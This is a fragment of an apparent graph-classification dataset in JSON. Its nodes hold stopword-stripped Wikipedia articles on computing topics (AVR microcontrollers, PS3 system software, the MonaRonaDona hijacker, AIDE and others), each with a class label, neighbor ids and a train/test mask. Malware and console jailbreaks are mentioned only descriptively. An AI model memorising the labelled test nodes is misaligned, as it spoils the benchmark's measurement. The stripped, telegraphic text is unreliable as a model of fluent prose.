    "text": "Game_Over_(video_game):game video game game action video game developed dinamic software published imagine software 1987 available amstrad cpc commodore 64 msx thomson to7 zx spectrum game generally received positively game promotional artwork caused controversy due portrayal female nipple subsequently covered-up sequel game ii released 1987 game shoot 'em game second part game features adventure game elements arkos former loyal lieutenant beautiful evil galactic empress queen gremla became rebel dedicated end cruel tyranny first part game takes place prison planet hypsis arkos must try escape second part arkos arrives jungle swamp planet sckunn infiltrate queen palace defeat giant guardian robot assassinate game mostly well received sinclair rated zx spectrum version 9/10 tragically modified 1990 re-release edition given 52 high difficulty level computer video games awarded 8/10 zx spectrum 7/10 amstrad cpc versions msx version rated overall 8/10 msx extra commodore 64 version given score 68 zzap 64 game best known controversy regarding image queen gremla visible nipple seen advertising inlay artwork originally appeared cover heavy metal may 1984 vol.8 no.2 called cover ere comprimee attributed luis royo oli frey art editor crash magazine painted original bare-breasted image thin grey corset could printed retailers still demanded logos placed nipples game awards best advert best inlay year according readers crash game followed game ii also known phantis native spain developed published dinamic software 1987",
    "neighbors": [
      3915,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 681,
    "label": 4,
    "text": "MonaRonaDona:monaronadona monaronadona browser hijacker uses unique tactics popups alert messages stating infected virus monaronadona known come various rogue programs registry clean fix unigray anti-virus monaronadona usually downloaded unigray anti-virus program certain ads registry clean fix monaronadona remains inactive times left undiscoverable anti-virus programs monaronadona uses stealth tactics presenting infection message monaronadona displays following false warning message attempt scare users searching fix “ hi name monaronadona virus wreck pc observe strange behavior pc like program windows disappearing etc ’ created protest human rights violation observed throughout world purpose existence remind stress world respect humanity. ” message sends computer users searching internet likelihood running another malicious website spending money something bogus monaronadona installs following windows registry keys monaronadona behaves unlike known rogue software monaronadona characteristics may come rogue software unigray antivirus monaronadona also identified troj_monagray.a trojan infection",
    "neighbors": [
      4165,
      877,
      6797,
      5935,
      10392,
      7515
    ],
    "mask": "None"
  },
  {
    "node_id": 682,
    "label": 3,
    "text": "AVR_microcontrollers:avr microcontrollers avr family microcontrollers developed since 1996 atmel acquired microchip technology 2016 modified harvard architecture 8-bit risc single-chip microcontrollers avr one first microcontroller families use on-chip flash memory program storage opposed one-time programmable rom eprom eeprom used microcontrollers time avr microcontrollers find many applications embedded systems especially common hobbyist educational embedded applications popularized inclusion many arduino line open hardware development boards avr architecture conceived two students norwegian institute technology nth alf-egil bogen vegard wollan original avr mcu developed local asic house trondheim norway called nordic vlsi time nordic semiconductor bogen wollan working students known μrisc micro risc available silicon ip/building block nordic vlsi technology sold atmel nordic vlsi internal architecture developed bogen wollan atmel norway subsidiary atmel designers worked closely compiler writers iar systems ensure avr instruction set provided efficient compilation high-level languages atmel says name avr acronym stand anything particular creators avr give definitive answer term avr stands however commonly accepted avr stands alf vegard risc processor note use avr article generally refers 8-bit risc line atmel avr microcontrollers among first avr line at90s8515 40-pin dip package pinout 8051 microcontroller including external multiplexed address data bus polarity reset line opposite 8051 active-high reset avr active-low reset pinout identical avr 8-bit microcontroller architecture introduced 1997 2003 atmel shipped 500 million avr flash microcontrollers arduino platform developed simple electronics projects released 2005 featured atmega8 avr microcontrollers avr modified harvard architecture machine program data stored separate physical memory systems appear different address spaces ability read data items program memory using special instructions avrs generally classified following flash eeprom sram integrated onto single chip removing need external memory applications devices parallel external bus option allow adding additional data memory memory-mapped devices almost devices except smallest tinyavr chips serial interfaces used connect larger serial eeproms flash chips program instructions stored non-volatile flash memory although mcus 8-bit instruction takes one two 16-bit words size program memory usually indicated naming device e.g. atmega64x line 64 kb flash atmega32x line 32 kb provision off-chip program memory code executed avr core must reside on-chip flash however limitation apply at94 fpslic avr/fpga chips data address space consists register file i/o registers sram small models also map program rom data address space larger models avrs 32 single-byte registers classified 8-bit risc devices tinyavr megaavr variants avr architecture working registers mapped first 32 memory addresses 0000–001f followed 64 i/o registers 0020–005f devices many peripherals registers followed 160 “ extended i/o ” registers accessible memory-mapped i/o 0060–00ff actual sram starts register sections address 0060 devices extended i/o 0100 even though separate addressing schemes optimized opcodes accessing register file first 64 i/o registers also addressed manipulated sram smallest tinyavr variants use reduced architecture 16 registers r0 r15 omitted addressable memory locations i/o memory begins address 0000 followed sram addition devices slight deviations standard avr instruction set notably direct load/store instructions lds/sts reduced 2 words 32 bits 1 word 16 bits limiting total direct addressable memory sum i/o sram 128 bytes conversely indirect load instruction ld 16-bit address space expanded also include non-volatile memory flash configuration bits therefore load program memory lpm instruction unnecessary omitted detailed info see atmel avr instruction set xmega variant working register file mapped data address space possible treat xmega working registers though sram instead i/o registers mapped data address space starting beginning address space additionally amount data address space dedicated i/o registers grown substantially 4096 bytes 0000–0fff previous generations however fast i/o manipulation instructions reach first 64 i/o register locations first 32 locations bitwise instructions following i/o registers xmega series sets aside 4096 byte range data address space used optionally mapping internal eeprom data address space 1000–1fff actual sram located ranges starting 2000 gpio port tiny mega avr drives eight pins controlled three 8-bit registers ddr x port x pin x x port identifier newer attiny avr like attiny817 siblings port control registers somewhat differently defined xmegaavr additional registers push/pull totem-pole pullup configurations almost avr microcontrollers internal eeprom semi-permanent data storage like flash memory eeprom maintain contents electrical power removed variants avr architecture internal eeprom memory mapped mcu addressable memory space accessed way external peripheral device using special pointer registers read/write instructions makes eeprom access much slower internal ram however devices secureavr at90sc family use special eeprom mapping data program memory depending configuration xmega family also allows eeprom mapped data address space since number writes eeprom limited atmel specifies 100,000 write cycles datasheets well designed eeprom write routine compare contents eeprom address desired contents perform actual write contents need changed note erase write performed separately many cases byte-by-byte may also help prolong life bits need set 1s erase selectively cleared 0s write atmel avrs two-stage single-level pipeline design means next machine instruction fetched current one executing instructions take one two clock cycles making avrs relatively fast among eight-bit microcontrollers avr processors designed efficient execution compiled c code mind several built-in pointers task avr instruction set orthogonal eight-bit microcontrollers particular 8051 clones pic microcontrollers avr competes today however completely regular additionally chip-specific differences affect code generation code pointers including return addresses stack two bytes long chips 128 kb flash memory three bytes long larger chips chips hardware multipliers chips 8 kb flash branch call instructions longer ranges forth mostly regular instruction set makes programming using c even ada compilers fairly straightforward gcc included avr support quite time support widely used fact atmel solicited input major developers compilers small microcontrollers determine instruction set features useful compiler high-level languages avr line normally support clock speeds 0 20 mhz devices reaching 32 mhz lower-powered operation usually requires reduced clock speed recent tiny mega xmega 90s avrs feature on-chip oscillator removing need external clocks resonator circuitry avrs also system clock prescaler divide system clock 1024 prescaler reconfigured software run-time allowing clock speed optimized since operations excluding multiplication 16-bit add/subtract registers r0–r31 single-cycle avr achieve 1 mips per mhz i.e 8 mhz processor achieve 8 mips loads stores to/from memory take two cycles branching takes two cycles branches latest 3-byte pc parts atmega2560 one cycle slower previous devices avrs large following due free inexpensive development tools available including reasonably priced development boards free development software avrs sold various names share basic core different peripheral memory combinations compatibility chips family fairly good although i/o controller features may vary see external links sites relating avr development avrs offer wide range features many means load program code avr chip methods program avr chips varies avr family family methods described use reset line enter programming mode order avoid chip accidentally entering mode advised connect pull-up resistor reset pin positive power supply in-system programming isp programming method functionally performed spi plus twiddling reset line long spi pins avr connected anything disruptive avr chip stay soldered pcb reprogramming needed 6-pin connector programming adapter common way develop avr atmel avrisp mkii device connects computer usb port performs in-system programming using atmel software avrdude avr downloader/uploader runs linux freebsd windows supports variety in-system programming hardware including atmel avrisp mkii atmel jtag ice older atmel serial-port based programmers various third-party do-it-yourself programmers program debug interface pdi atmel proprietary interface external programming on-chip debugging xmega devices pdi supports high-speed programming non-volatile memory nvm spaces flash eeprom fuses lock-bits user signature row done accessing xmega nvm controller pdi interface executing nvm controller commands pdi 2-pin interface using reset pin clock input pdi_clk dedicated data pin pdi_data input output unified program debug interface updi one-wire interface external programming on-chip debugging newer attiny atmega devices high-voltage serial programming hvsp mostly backup mode smaller avrs 8-pin avr package leave many unique signal combinations place avr programming mode 12-volt signal however something avr see programming never normal operation high voltage mode also used devices reset pin disabled fuses high-voltage parallel programming hvpp considered final resort may way correct bad fuse settings avr chip avr models reserve bootloader region 256 bytes 4 kb re-programming code reside reset bootloader runs first user-programmed determination whether re-program jump main application code re-program interface available could read encrypted binary ethernet adapter like pxe atmel application notes code pertaining many bus interfaces at90sc series avrs available factory mask-rom rather flash program memory large up-front cost minimum order quantity mask-rom cost-effective high-production runs awire new one-wire debug interface available new uc3l avr32 devices avr offers several options debugging mostly involving on-chip debugging chip target system debugwire atmel solution providing on-chip debug capabilities via single microcontroller pin particularly useful lower pin count parts provide four spare pins needed jtag jtagice mkii mkiii avr dragon support debugwire debugwire developed original jtagice release clones support joint test action group jtag feature provides access on-chip debugging functionality chip running target system jtag allows accessing internal memory registers setting breakpoints code single-stepping execution observe system behaviour atmel provides series jtag adapters avr jtag also used perform boundary scan test tests electrical connections avrs boundary scan capable chips system boundary scan well-suited production line hobbyist probably better testing multimeter oscilloscope official atmel avr development tools evaluation kits contain number starter kits debugging tools support avr devices stk600 starter kit development system update stk500 stk600 uses base board signal routing board target board base board similar stk500 provides power supply clock in-system programming rs-232 port controller area network automotive standard port via de9 connectors stake pins gpio signals target device target boards zif sockets dip soic qfn qfp packages depending board signal routing board sits base board target board routes signals proper pin device board many different signal routing boards could used single target board depending device zif socket stk600 allows in-system programming pc via usb leaving rs-232 port available target microcontroller 4 pin header stk600 labeled 'rs-232 spare connect ttl level usart port chip onboard max232 chip translate signals rs-232 levels rs-232 signals connected rx tx cts rts pins db-9 connector stk500 starter kit development system features isp high voltage programming hvp avr devices either directly extension boards board fitted dip sockets avrs available dip packages stk500 expansion modules several expansion modules available stk500 board stk200 starter kit development system dip socket host avr chip 40 20 8-pin package board clock source 8 light-emitting diode led 8 input buttons rs-232 port socket 32k sram numerous general i/o chip programmed dongle connected parallel port avrisp avrisp mkii inexpensive tools allowing avrs programmed via icsp avrisp connects pc via serial port draws power target system avrisp allows using either standard icsp pinouts either 10-pin 6-pin connector avrisp mkii connects pc via usb draws power usb leds visible translucent case indicate state target power avrisp mkii lacks driver/buffer ics trouble programming target boards multiple loads spi lines occurrences programmer capable sourcing greater current required alternatively avrisp mkii still used low-value ~150 ohm load-limiting resistors placed spi lines peripheral device avrisp avrisp mkii discontinued product pages removed microchip website july 2019 avrisp mkii still stock number distributors also number 3rd party clones available atmel dragon inexpensive tool connects pc via usb dragon program avrs via jtag hvp pdi icsp dragon also allows debugging avrs via jtag pdi debugwire previous limitation devices 32 kb less program memory removed avr studio 4.18 dragon small prototype area accommodate 8 28 40-pin avr including connections power programming pins area additional circuitry although provided third-party product called dragon rider jtag circuit emulator jtagice debugging tool supports on-chip debugging ocd avrs jtag interface original jtagice mki uses rs-232 interface pc program avr jtag interface jtagice mki longer production however replaced jtagice mkii jtagice mkii debugging tool supports on-chip debugging ocd avrs spi jtag pdi debugwire interfaces debugwire interface enables debugging using one pin reset pin allowing debugging applications running low pin-count microcontrollers jtagice mkii connects using usb alternate connection via serial port requires using separate power supply addition jtag mkii supports isp programming using 6-pin 10-pin adapters usb serial links use variant stk500 protocol jtagice3 updates mkii advanced debugging capabilities faster programming connects via usb supports jtag awire spi pdi interfaces kit includes several adapters use interface pinouts avr one professional development tool atmel 8-bit 32-bit avr devices on-chip debug capability supports spi jtag pdi awire programming modes debugging using debugwire jtag pdi awire interfaces popular avr butterfly demonstration board self-contained battery-powered computer running atmel avr atmega169v microcontroller built show avr family especially new built-in lcd interface board includes lcd screen joystick speaker serial port real time clock rtc flash memory chip temperature voltage sensors earlier versions avr butterfly also contained cds photoresistor present butterfly boards produced june 2006 allow rohs compliance small board shirt pin back worn name badge avr butterfly comes preloaded software demonstrate capabilities microcontroller factory firmware scroll name display sensor readings show time avr butterfly also piezoelectric transducer used reproduce sounds music avr butterfly demonstrates lcd driving running 14-segment six alpha-numeric character display however lcd interface consumes many i/o pins butterfly atmega169 cpu capable speeds 8 mhz factory set software 2 mhz preserve button battery life pre-installed bootloader program allows board re-programmed via standard rs-232 serial plug new programs users write free atmel ide tools small board half size business card priced slightly avr butterfly includes at90usb1287 usb on-the-go otg support 16 mb dataflash leds small joystick temperature sensor board includes software lets act usb mass storage device documentation shipped dataflash usb joystick support usb host capability must operated battery running usb peripheral needs power provided usb jtag port uses conventional 2.54 mm pinout avr i/o ports require compact 1.27 mm headers avr dragon program debug since 32 kb limitation removed avr studio 4.18 jtagice mkii capable programming debugging processor processor also programmed usb windows linux host using usb device firmware update protocols atmel ships proprietary source code included distribution restricted example programs usb protocol stack device lufa third-party free software mit license usb protocol stack usbkey 8-bit usb avrs raven kit supports wireless development using atmel ieee 802.15.4 chipsets zigbee wireless stacks resembles pair wireless more-powerful butterfly cards plus wireless usbkey costing much us100 boards support jtag-based development kit includes two avr raven boards 2.4 ghz transceiver supporting ieee 802.15.4 freely licensed zigbee stack radios driven atmega1284p processors supported custom segmented lcd display driven atmega3290p processor raven peripherals resemble butterfly piezo speaker dataflash bigger external eeprom sensors 32 khz crystal rtc intended use developing remote sensor nodes control relays whatever needed usb stick uses at90usb1287 connections usb host 2.4 ghz wireless links intended monitor control remote nodes relying host power rather local batteries wide variety third-party programming debugging tools available avr devices use various interfaces including rs-232 pc parallel port usb avrs used various automotive applications security safety powertrain entertainment systems atmel recently launched new publication atmel automotive compilation help developers automotive applications current usages bmw daimler-chrysler trw arduino physical computing platform based atmega328 microcontroller atmega168 atmega8 board versions older diecimila atmega1280 atmega2560 pinout memory capabilities also employed develop arduino mega platform arduino boards used language ide conventional programming environments c assembler etc standardized widely available avr platforms usb-based avrs used microsoft xbox hand controllers link controllers xbox usb numerous companies produce avr-based microcontroller boards intended use hobbyists robot builders experimenters small system developers including cubloc gnusb basicx oak micros zx microcontrollers myavr also large community arduino-compatible boards supporting similar users schneider electric produces m3000 motor motion control chip incorporating atmel avr core advanced motion controller use variety motion applications growing popularity fpgas among open source community people started developing open source processors compatible avr instruction set opencores website lists following major avr clone projects addition chips manufactured atmel clones available logicgreen technologies microcontrollers using atmega architecture manufactured niiet voronesh russia part 1887 series integrated circuits includes atmega128 designation 1887ve7t official communities",
    "neighbors": [
      7170,
      11267,
      10767,
      5663,
      4144,
      11314,
      9779,
      2623,
      6207,
      7234,
      7235,
      3142,
      7774,
      10851,
      7269,
      3175,
      11374,
      7281,
      9330,
      11395,
      1170,
      4246,
      9371,
      8861,
      4773,
      6311,
      682,
      4269,
      9391,
      2224,
      3762,
      9911,
      11447,
      10945,
      9928,
      10964,
      10985,
      9964,
      1776,
      8944,
      757,
      249,
      2811,
      2306,
      8450,
      6925,
      1298,
      7445,
      282,
      8487,
      3886,
      9006,
      11054,
      8501,
      823,
      2874,
      3904,
      9541,
      8523,
      9044,
      4450,
      10603,
      8048,
      11125,
      1399,
      3451,
      3467,
      1952,
      3493,
      9638,
      7604,
      1462,
      6084,
      3014,
      9163,
      6607,
      2517,
      9685,
      4569,
      477,
      1502,
      5598,
      3050,
      2039,
      8700,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 683,
    "label": 3,
    "text": "Creative_Wave_Blaster:creative wave blaster wave blaster add-on midi-synthesizer creative sound blaster 16 sound blaster awe32 family pc soundcards sample-based synthesis general midi compliant synthesizer general midi scores wave blaster wavetable-engine produced realistic instrumental music sb16 onboard yamaha-opl3 wave blaster attached sb16 26-pin expansion-header eliminating need extra cabling sb16 wave blaster sb16 emulated mpu-401 uart giving existing midi-software option send midi-sequences directly attached wave blaster instead driving external midi-device wave blaster analog stereo-output fed dedicated line-in sb16 onboard-mixer allowed equalization mixing volume adjustment wave blaster port adopted sound card manufacturers produced daughterboards soundcards expansion-header diamond ensoniq guillemot oberheim orchid roland terratec turtle beach yamaha header also appeared devices korg nx5r midi sound module oberheim mc-1000/mc-2000 keyboards terratec axon ax-100 guitar-to-midi converter since 2000 wave blaster-capable sound cards computers becoming rare 2005 terratec released new wave blaster daughterboard called wave xtable 16mb on-board sample memory comprising 500 instruments 10 drum kits 2014 new compatible card called dreamblaster s1 produced belgian company serdaco 2015 company released high end card named dreamblaster x1 comparable yamaha roland cards 2016 dreamblaster x2 released board waveblaster interface usb interface creative released waveblaster ii ct1910 shortly original waveblaster waveblaster ii used newer e-mu emu8000 synthesis-engine later appeared awe32 people believe despite using smaller 2mb instrument rom vs 4mb original waveblaster waveblaster ii delivered better renditions midi-scored games likely due feel better sample refinement balancing instruments original waveblaster greatly improved upon acoustic quality sb16 built-in fm-synthesis acoustic quality instrument-set poorly regarded general public time sb16 reached height popularity competing midi-daughterboards already pushed aside waveblaster particular roland sound canvas daughterboards scd-10/15 priced higher creative offering highly regarded unrivalled musical reproduction midi-scored game titles due roland dominance production aspect midi game soundtracks roland daughterboards shared synthesis-engine instrument sound-set popular sound canvas 55 commercial midi module favored game composers comparison waveblaster instruments improperly balanced many instruments striking different volume-levels relative de facto standard sound canvas computer gaming world 1993 praised wave blaster audio quality stated card best wave-table synthesis device compatible sound card",
    "neighbors": [
      8561,
      10363,
      10371
    ],
    "mask": "None"
  },
  {
    "node_id": 684,
    "label": 2,
    "text": "PlayStation_3_system_software:playstation 3 system software playstation 3 system software updatable firmware operating system playstation 3 base operating used sony playstation 3 fork freebsd netbsd called cellos process updating almost identical playstation portable playstation vita playstation 4 software may updated downloading update directly playstation 3 downloading user local official playstation website pc using usb storage device transfer playstation 3 installing update game discs containing update data initial slim ps3s sku shipped unique firmware new features also seen software 3.00 native operating system playstation 3 cellos believed fork freebsd tcp/ip stack fingerprinting identifies playstation 3 running freebsd playstation 3 known contain code freebsd netbsd 3d computer graphics api software used playstation 3 libgcm psgl based opengl es nvidia cg libgcm low level api psgl higher level api developers preferred use libgcm due higher levels performance similar later playstation 4 console also two apis low level gnm higher level gnmx unlike software development kit sdk mobile apps sony playstation 3 sdk available registered game development companies contains software tools integrated hardware component due fact requires licensing agreement sony considered expensive number open source homebrew ps3 sdks available addition number leaked ps3 sdks playstation 3 uses xrossmediabar xmb graphical user interface also used playstation portable psp handheld console variety sony bravia hdtvs blu-ray disc players many sony products xmb displays icons horizontally across screen seen categories users navigate using left right buttons d-pad move icons forward back across screen highlighting one time opposed using kind pointer select option one category selected usually specific options available select spread vertically selected icon users may navigate among options using buttons d-pad basic features offered xmb implementations varies based device software version apart appearing psp console category icons photos music games ps3 added users tv friends xmb also xmb offers degree multitasking in-game xmb features added ps3 properly firmware version 2.41 causing early implementation problems xmb proved successful user interface sony products psp ps3 next generation sony video game consoles playstation 4 playstation vita longer use user interface playstation 3 supports remote play sony handheld game consoles playstation portable playstation vita however unlike remote play playstation 4 playstation vita problem ps3 supported select titles results often laggy however clear remote play ps3 testing bed much better integration ps4 also users playstation 3 playstation vita possible share media files videos music images transferring multimedia files directly playstation 3 playstation vita vice versa furthermore use service called cross-buy allows buy certain games support feature one time play sony platforms case games saved games actually transfer back forth devices allowing players pick moment left also feature called cross-play cross-platform play covering playstation vita software title interact playstation 3 software title different software titles use cross-play different ways example ultimate marvel vs. capcom 3 title supporting cross-play feature ps3 version game controlled using ps vita system addition ps3 games played ps vita using playstation streaming service similar many consoles playstation 3 capable photo audio video playback variety formats also includes various photo slideshow options several music visualizations furthermore playstation 3 able play blu-ray disc dvd movies well audio cds box also capable adopting streaming media services netflix web browser ps3 uses netfront browser although unlike successor ps4 uses modern webkit core safari apple ps3 web browser receives low score html5 compliance testing however unlike ps4 ps3 able play adobe flash including full-screen flash early versions playstation 3 system software also provided feature called otheros available ps3 systems prior slimmer models launched september 2009 feature enabled users install operating system linux due security concerns sony later removed functionality 3.21 system software update according sony computer entertainment sce disabling feature help ensure ps3 owners continue access broad range gaming entertainment content sce content partners secure system sony successfully sued class action removal feature settlement approved september 2016 sony agreed pay 55 many 10 million ps3 owners denied wrongdoing furthermore playstation 3 provides printing support example print images web pages supported printer connected via usb cable local network however selection printers canon epson hewlett-packard compatible ps3 playstation 3 consoles able play original playstation games psone discs downloadable classics however playstation 3 models backwards compatible playstation 2 games summary early ps3 consoles 60gb 20gb launch ps3 consoles backwards compatible ps2 games ps2 chips later models notably 80gb metal gear solid ps3 consoles also backwards compatible partial software emulation case since longer ps2 cpu although ps2 gpu allowing reduced backward compatibility hardware-assisted software emulation later models ps3 slim ps2 backwards compatible though users still enjoy ps3 psone games according sony removed backwards compatibility ps3 already point three years lifecycle time vast majority consumers purchasing ps3 cite ps3 games primary reason meaning ps2 compatibility longer necessary nevertheless ps2 classics playable ps3 officially introduced playstation network purchase afterwards although selection ps2 games republished digital format unlike ps3 games lack trophy support later playstation 4 console released backward compatible either playstation 3 playstation 2 games although limited ps2 backward compatibility later introduced ps4 owners might play selected group ps3 games streaming internet using playstation cloud-based gaming service playstation 3 lv0 keys set cryptographic keys form core playstation 3 security system according news story polygon lv0 keys users able circumvent restrictions placed sony commonly known jailbreaking lv0 keys released online group calling three musketeers granting users access sensitive parts playstation 3 access areas users decrypt security updates work around authorized playstation firmware allows playstation 3 firmware updates modified computer run modified console three musketeers decided release code group rival hackers obtained code planned sell first time playstation 3 hacked according eurogamer release new custom firmware—and lv0 decryption keys particular—poses serious issues also says options sony battling leak limited since reveal lv0 key basically means system update released sony going forward decrypted little effort whatsoever initial release playstation 3 system software version 1.10 appeared november 11 2006 japan november 17 2006 north america provided playstation network services remote play 60 gb model however version 1.02 included games number updates 1.xx versions provided new features account management compatibility usb devices playstation 2 format games supports usb webcams bluetooth keyboards mice version 1.80 released may 24 2007 added number relatively small new features mostly related media videos ability upscale standard dvd-videos 1080p downscale blu-ray video 720p version 1.90 released may 24 2007 added wallpaper feature background xmb ability eject game disc using controller re-order game icons format creation date update also forced 24 hz output blu-ray hdmi introduced bookmarks security function web browser last version 1.xx series 1.94 released october 23 2007 added support dualshock 3 controllers version 1.xx series number versions 2.xx 3.xx series released november 8 2007 september 20 2011 quite noticeable changes version 2.10 alone new features additions voice changer feature power make users sound like person using voice changer five presets hi low tones new music bitmapping process specifically designed ps3 provide enhanced audio playback well supports divx wmv playback blu-ray disc profile 1.1 picture-in-picture version 2.50 released october 15 2008 update 2.xx series contained largest number new features changes among support official ps3 bluetooth headset in-game screenshots adobe flash 9 recovery menu safe mode also introduced version later versions 2.xx series 2.7x 2.85 2.90 distributed ps3 slim similar versions 2.00 versions 3.00 3.10 3.30 3.40 3.70 introduced relatively large number new features changes supports new dynamic custom themes improvements internet browser trophy enhancements new video editor uploader application noticeable change version 4.00 released november 30 2011 added support playstation vita handheld game consoles example ps vita system added option ps vita system application utility added feature game update playstation 3 also gained ability transfer videos images musics game data playstation vita version 4.10 released february 8 2012 also added improvements internet browser including support html5 display speed web page layout accuracy later versions 4.xx series made changes system mostly improve stability operation quality uses applications addition adding new features displaying closed captions playing bds dvds check update options menu game playstation 3 system software currently still updated sony system software version 2.40 included in-game xmb feature playstation 3 trophies released july 2 2008 however withdrawn later day small number users unable restart consoles performing update fault explained certain system administrative data contained hdd issue addressed version 2.41 system software released july 8 2008 system software version 3.0 released september 1 2009 shortly release number users complained system update caused system blu-ray drive malfunction addition john kennedy florida filed class action suit sony computer entertainment america john kennedy purchased playstation 3 january 2009 claiming worked perfectly installed required firmware update 3.0 point blu-ray drive system ceased functioning properly sony later released statement scea aware reports ps3 owners experiencing isolated issues ps3 system since installing recent system software update v3.00 released software update 3.01 september 15 2009 however installing 3.01 plaintiff alleged problems solved new update created new issues well due removal otheros feature older models ps3 due security issues possibly related exploit released geohot caused uproar playstation community several lawsuits filed first one filed behalf ps3 owners anthony ventura suit states removing feature constitutes breach contract false advertising handful business practices relating consumer protection laws feature touted sony systems new way consumers could turn machines basic pc cites feature extremely valuable one main reasons many people paid ps3 buying competing console like wii xbox 360 also elaborates anyone accept update longer play future games future blu-ray movie releases later two suits also filed members playstation 3 community first newer lawsuits filed todd densmore antal herz claim sony rendered several playstation 3 features paid inoperable result release firmware 3.21 second filed jason baker sean bosquett paul graham paul vannatta claims among things lost money purchasing ps3 without receiving benefit bargain product claimed game console would provide os feature gaming functions fourth lawsuit filed keith wright seeks compensation equal cost console fifth lawsuit filed jeffrey harper zachary kummer calls jury trial sixth lawsuit filed johnathon huber quotes eu us playstation blogs sony responded lawsuits requesting dismissal grounds one cared feature filings cite quotes 3rd party websites instruction manual playstation web site claims invalid proof sony disable psn advertised features playing games require newer firmware etc wish lawyers plaintiffs reviewed request said fairly common stage process case would reviewed judge november 2010 february 2011 claims false advertising case dismissed plaintiffs allowed appeal amend case claims removal violated computer fraud abuse act allowed go forward march 2011 plaintiffs amended complaint refute sony claims within rights tos warranty remove feature adding details claims including breach warranty breach implied warranty breach contract unjust enrichment breach several california unfair business practices laws april 2011 scea asked case dismissed made claims plaintiffs refiled claim insufficient hackers wanted violate sony intellectual property asked judge grant search rights ps3 systems scea also made claims division solely responsible removal held responsible despite conflicting information contrary april 18 2011 plaintiffs fired back sony renewed efforts case dismissed pointing fact sony made many claims dismissed court also pointed several legal precedents california law refuted sony claims december 2011 whole case dismissed grounds plaintiffs failed prove could expect os feature beyond warranty machine however decision overturned 2014 appellate court decision finding plaintiffs indeed made clear sufficiently substantial claims ultimately 2016 sony settled users installed linux purchased playstation 3 based upon alternative os functionality system software version 4.45 released june 18 2013 however withdrawn one day later small number users unable restart consoles performing update june 21 2013 morgan haro community manager playstation network announced issue identified new update planned released resolve issue system update addressed issue version 4.46 released june 27 2013 fix affected system version 4.45 also provided sony gaming platforms sony gaming platforms next generation gaming platforms generation official playstation 3 system software update page",
    "neighbors": [
      3077,
      10761,
      2061,
      9743,
      8725,
      4636,
      1067,
      1587,
      1080,
      5177,
      1091,
      3651,
      7748,
      8266,
      6732,
      10316,
      7249,
      6738,
      9306,
      607,
      9320,
      5746,
      9844,
      7801,
      633,
      8316,
      8829,
      1148,
      6781,
      9343,
      643,
      11398,
      4745,
      6799,
      2212,
      6311,
      1718,
      5819,
      11459,
      10436,
      9927,
      8395,
      10455,
      6361,
      6873,
      8937,
      9452,
      3824,
      2293,
      1273,
      6909,
      5384,
      4364,
      274,
      5397,
      1316,
      9508,
      10535,
      9512,
      4908,
      9518,
      1839,
      7983,
      306,
      11573,
      823,
      9543,
      10056,
      9033,
      850,
      6486,
      859,
      6491,
      7521,
      1891,
      359,
      873,
      7027,
      7028,
      2421,
      2424,
      7552,
      5506,
      9091,
      1927,
      9625,
      1946,
      5534,
      4516,
      11698,
      9146,
      9151,
      9153,
      10202,
      4060,
      3551,
      998,
      487,
      4073,
      9201,
      3058,
      8700
    ],
    "mask": "Test"
  },
  {
    "node_id": 685,
    "label": 7,
    "text": "Booker_Software:booker software booker software inc. software company headquartered new york city products cloud-based management systems spas salons booker headquartered new york city offices irvine california scottsdale arizona united kingdom singapore booker started 2007 peter ellis daniel lizio-katzen spabooker division spafinder spabooker initial software product october 2010 spabooker spun separate company called gramercyone time company continued add features spabooker platform market appointment-based service businesses hotels medical practices dance studios repair shops november 2012 gramercyone changed name booker software inc. march 2015 booker 270 employees leadership ceo josh mccarter february 2017 booker expanded new 10,000-square-foot office skysong booker 9,000 business clients 73 countries notable clients include hilton hotels hard rock café drybar october 2011 booker gramercyone secured 14.5 million funding revolution ventures grotech ventures tdf jubilee november 2012 booker reported triple-digit revenue growth fourth consecutive year august 2013 booker processing 4.5 million daily transactions 2 million monthly appointment bookings platform company grew 30 employees 160+ employees 2010 2012 april 16 2013 booker secured 27.5 million series b financing led bain capital ventures booker series investors revolution ventures grotech ventures tdf ventures vital financial also participated financing round march 2018 booker got acquired mindbody another leading cloud based business management software wellness service industry 150 million booker software designed help service businesses manage operations marketing platform cloud-based allowing users access accounts booker ’ desktop iphone ipad android applications booker currently version 8.5 booker ’ software sold general industry-specific names booker bookerenterprise spabooker salonbooker features including online booking employee room scheduling social media marketing specials/deal distribution payment processing wait list management customer database/management additionally software integrates business ’ social media profiles including facebook twitter foursquare booker account includes access scheduling gift certificate applications facebook booker software compared opentable online reservation system used restaurants spabooker salonbooker marketed packaged independent spas salons booker partners allure magazine virtual store lifebooker spafinder",
    "neighbors": [
      9732,
      1023
    ],
    "mask": "Validation"
  },
  {
    "node_id": 686,
    "label": 7,
    "text": "Babel_(protocol):babel protocol babel routing protocol distance-vector routing protocol internet protocol packet-switched networks designed robust efficient wireless mesh networks wired networks babel based ideas destination-sequenced distance vector routing dsdv ad hoc on-demand distance vector routing aodv cisco enhanced interior gateway routing protocol eigrp uses different techniques loop avoidance babel provisions using multiple dynamically computed metrics default uses hop-count wired networks variant etx wireless links configured take radio diversity account automatically compute link latency include metric babel operates ipv4 ipv6 networks reported robust protocol fast convergence properties october 2015 babel chosen mandatory-to-implement protocol ietf homenet working group albeit experimental basis june 2016 ietf working group created whose main goal produce standard version babel four implementations babel freely available bird reference version support source-specific routing.. extension authentication available reference version merged yet mainline version",
    "neighbors": [
      4611,
      2825,
      9098,
      1814,
      3095,
      152,
      8862,
      2206,
      2085,
      3751,
      3752,
      7983,
      823,
      11579,
      9279,
      10433,
      5959,
      5322,
      11086,
      10451,
      9048,
      5978,
      3036,
      5469,
      5470,
      5472
    ],
    "mask": "None"
  },
  {
    "node_id": 687,
    "label": 4,
    "text": "Advanced_Intrusion_Detection_Environment:advanced intrusion detection environment advanced intrusion detection environment aide initially developed free replacement tripwire licensed terms gnu general public license gpl primary developers named rami lehti pablo virolainen associated tampere university technology along richard van den berg independent dutch security consultant project used many unix-like systems inexpensive baseline control rootkit detection system aide takes snapshot state system register hashes modification times data regarding files defined administrator snapshot used build database saved may stored external device safekeeping administrator wants run integrity test administrator places previously built database accessible place commands aide compare database real status system change happened computer snapshot creation test aide detect report administrator alternatively aide configured run schedule report changes daily using scheduling technologies cron default behavior debian aide package mainly useful security purposes given malicious change could happened inside system would reported aide",
    "neighbors": [
      6372,
      7983,
      8399,
      5397,
      5245,
      3353,
      2045,
      9791
    ],
    "mask": "None"
  },
  {
    "node_id": 688,
    "label": 4,
